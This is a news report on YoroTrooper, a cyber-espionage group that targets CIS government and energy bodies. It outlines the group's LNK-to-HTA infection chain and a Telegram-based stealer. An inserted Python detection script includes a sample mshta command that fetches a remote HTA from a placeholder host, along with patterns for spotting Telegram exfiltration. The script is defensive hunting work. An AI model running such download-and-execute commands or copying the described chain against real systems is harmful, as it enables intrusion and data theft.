YoroTrooper Stealing Credentials and Information from Government and Energy Organizations

March 15, 2023 | Ravie Lakshmanan | Cyber Espionage / Data Security


A previously undocumented threat actor tracked as YoroTrooper has targeted government, energy and international organizations across Europe as part of a cyber espionage campaign that has been active since at least June 2022.

Cisco Talos researchers Asheer Malhotra and Vitor Ventura said in an analysis on Tuesday:

Prominent countries targeted include Azerbaijan, Tajikistan, Kyrgyzstan, Turkmenistan, and other Commonwealth of Independent States (CIS) countries.

The threat actor is assessed to be Russian-speaking, based on the victimology pattern and the presence of Cyrillic snippets in some of the implants.

The YoroTrooper intrusion set has also been found to overlap tactically with PoetRAT, an actor documented in 2020 for using coronavirus-themed lures to attack Azerbaijan's government and energy sector.

YoroTrooper's data collection goal is achieved through an infection chain that combines commodity stealer malware such as Ave Maria (aka Warzone RAT), LodaRAT, Meterpreter and Stink with malicious shortcut files (LNK) and decoy documents wrapped in ZIP or RAR archives, delivered via spear-phishing.


The LNK files act as simple downloaders that execute HTA files retrieved from remote servers. The HTA file displays a lure PDF document while secretly launching a dropper that delivers a custom stealer, which uses Telegram as its exfiltration channel.
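The chain above (shortcut launching mshta.exe against a remote HTA, then a follow-on stealer talking to the Telegram Bot API) gives a defender two concrete hunting hooks. The script below is an added illustration, not code from the Talos report or from the campaign: it runs two detection rules over constructed process-creation and network events whose field names, PIDs, hostnames and command lines are all assumed for the example.

```python
"""Detection rules for the LNK -> mshta.exe -> stealer -> Telegram chain.

Added example, not part of the original article.  All telemetry below is
constructed with an assumed field layout (pid, ppid, image, cmdline for
process events; pid, dst_host, dst_port for network events).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample telemetry; hostnames and paths are placeholders.
PROCESS_EVENTS = [
    {"pid": 100, "ppid": 4,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    # shortcut (LNK) stage: mshta.exe pulling an HTA from a remote server
    {"pid": 200, "ppid": 100, "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/lure/page.hta"},
    # follow-on stage spawned by the HTA (the article notes Python-based malware)
    {"pid": 300, "ppid": 200, "image": "python.exe",
     "cmdline": "python.exe stealer.pyw"},
    {"pid": 400, "ppid": 100, "image": "chrome.exe", "cmdline": "chrome.exe"},
    # benign-looking local HTA: should NOT match the remote-HTA rule
    {"pid": 500, "ppid": 100, "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Windows\\Temp\\local.hta"},
]
NETWORK_EVENTS = [
    {"pid": 300, "dst_host": "api.telegram.org", "dst_port": 443},  # stealer exfil
    {"pid": 400, "dst_host": "api.telegram.org", "dst_port": 443},  # browser, expected
    {"pid": 200, "dst_host": "example.invalid", "dst_port": 80},    # HTA download
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def detect_remote_hta(proc_events: List[Dict]) -> List[Finding]:
    """Rule 1: mshta.exe fetching an HTA over HTTP(S), the LNK downloader stage."""
    return [
        Finding("remote_hta_launch", e["pid"], e["cmdline"])
        for e in proc_events
        if e["image"].lower() == "mshta.exe" and REMOTE_HTA.search(e["cmdline"])
    ]


def detect_telegram_exfil(proc_events: List[Dict], net_events: List[Dict]) -> List[Finding]:
    """Rule 2: a non-browser process contacting the Telegram Bot API host."""
    by_pid = {e["pid"]: e for e in proc_events}
    findings = []
    for n in net_events:
        if n["dst_host"].lower() != "api.telegram.org":
            continue
        proc: Optional[Dict] = by_pid.get(n["pid"])
        image = proc["image"] if proc else "<unknown>"
        if image.lower() not in BROWSERS:
            findings.append(Finding("telegram_api_non_browser", n["pid"], image))
    return findings


def ancestry(pid: int, proc_events: List[Dict]) -> List[str]:
    """Walk parent links from pid to the root; gives the analyst the full chain."""
    by_pid = {e["pid"]: e for e in proc_events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain


def run(proc_events=PROCESS_EVENTS, net_events=NETWORK_EVENTS) -> List[Finding]:
    return detect_remote_hta(proc_events) + detect_telegram_exfil(proc_events, net_events)


if __name__ == "__main__":
    for f in run():
        print(f.rule, f.pid, f.detail, "<-", " <- ".join(ancestry(f.pid, PROCESS_EVENTS)))
```

Rule 2 deliberately excludes browsers so that ordinary Telegram web use does not fire; in a real deployment the allow-list and the event schema would be replaced with those of the EDR or proxy in use, and the ancestry walk is what ties the Telegram connection back to the mshta.exe parent.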


The use of LodaRAT is notable because it indicates that the malware, which is attributed to a separate group called Kasablanka, is used by multiple operators. Kasablanka has also been observed distributing Ave Maria in recent campaigns targeting Russia.

Other ancillary tools that YoroTrooper deploys consist of a reverse shell and a custom C-based keylogger that can record keystrokes and save them to a file on disk.

“It is worth noting that although this campaign started distributing commodity malware such as Ave Maria and LodaRAT, it has evolved significantly to include Python-based malware,” said the researchers.

“This underscores the increased efforts the attackers are making, which may stem from successful compromises over the course of the campaign.”
